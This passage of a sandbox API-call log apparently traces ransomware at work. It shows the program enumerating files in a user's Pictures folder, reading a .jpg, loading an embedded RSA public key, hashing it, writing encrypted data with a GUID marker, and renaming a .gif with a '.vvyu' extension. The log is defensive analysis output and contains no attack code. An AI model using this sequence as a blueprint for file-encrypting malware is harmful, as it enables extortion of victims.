Size=0x10c) returned 0x2c99af8 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea7dd8 [0195.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7bc0 | out: hHeap=0x620000) returned 1 [0195.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7dd8 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0195.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0195.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1260 | out: hHeap=0x620000) returned 1 [0195.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.054] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3a68*, nNumberOfBytesToWrite=0x39be, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea3a68*, lpNumberOfBytesWritten=0x312fb14*=0x39be, lpOverlapped=0x0) returned 1 [0195.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.055] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x39c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.055] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0195.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0195.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.056] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0195.057] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.057] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.057] CloseHandle (hObject=0x568) returned 1 [0195.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0195.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.058] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\HZvZCiMH.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\hzvzcimh.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\HZvZCiMH.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\hzvzcimh.gif.vvyu")) returned 1 [0195.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.060] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.064] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fafd10, ftCreationTime.dwHighDateTime=0x1d8a6d3, ftLastAccessTime.dwLowDateTime=0x5c1aec20, ftLastAccessTime.dwHighDateTime=0x1d8a6fb, ftLastWriteTime.dwLowDateTime=0x5c1aec20, ftLastWriteTime.dwHighDateTime=0x1d8a6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KiR-tAs9lgdEh FXubwY", cAlternateFileName="KIR-TA~1")) returned 1 [0195.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0195.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0195.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2ea3a80 [0195.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0195.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.065] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeebecf0, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x5adc3a10, ftLastAccessTime.dwHighDateTime=0x1d8a518, ftLastWriteTime.dwLowDateTime=0x5adc3a10, ftLastWriteTime.dwHighDateTime=0x1d8a518, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyMAgs7f-4q1mza r", cAlternateFileName="KYMAGS~1")) returned 1 [0195.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0195.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.065] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ef7c00, ftCreationTime.dwHighDateTime=0x1d89a0c, ftLastAccessTime.dwLowDateTime=0x19eea700, ftLastAccessTime.dwHighDateTime=0x1d8a161, ftLastWriteTime.dwLowDateTime=0x19eea700, ftLastWriteTime.dwHighDateTime=0x1d8a161, nFileSizeHigh=0x0, nFileSizeLow=0xfb9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n-nH-E2t.jpg", cAlternateFileName="")) returned 1 [0195.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1260 [0195.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1260 | out: hHeap=0x620000) returned 1 [0195.066] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\n-nH-E2t.jpg") returned=".jpg" [0195.066] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\n-nH-E2t.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\n-nh-e2t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.066] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=64414) returned 1 [0195.067] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.070] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xfb78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.070] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.073] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.073] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xfb9e, lpOverlapped=0x0) returned 1 [0195.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.074] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.074] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.075] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.075] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.075] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.075] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.075] GetLastError () returned 0x0 [0195.076] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.076] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.076] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.076] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.076] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfba0) returned 0x2ea79b0 [0195.077] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1260 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea12a8 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.077] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0195.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c48 [0195.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c30 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.080] GetCurrentThreadId () returned 0x66c [0195.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea04f0 [0195.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.081] GetCurrentThreadId () returned 0x66c [0195.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 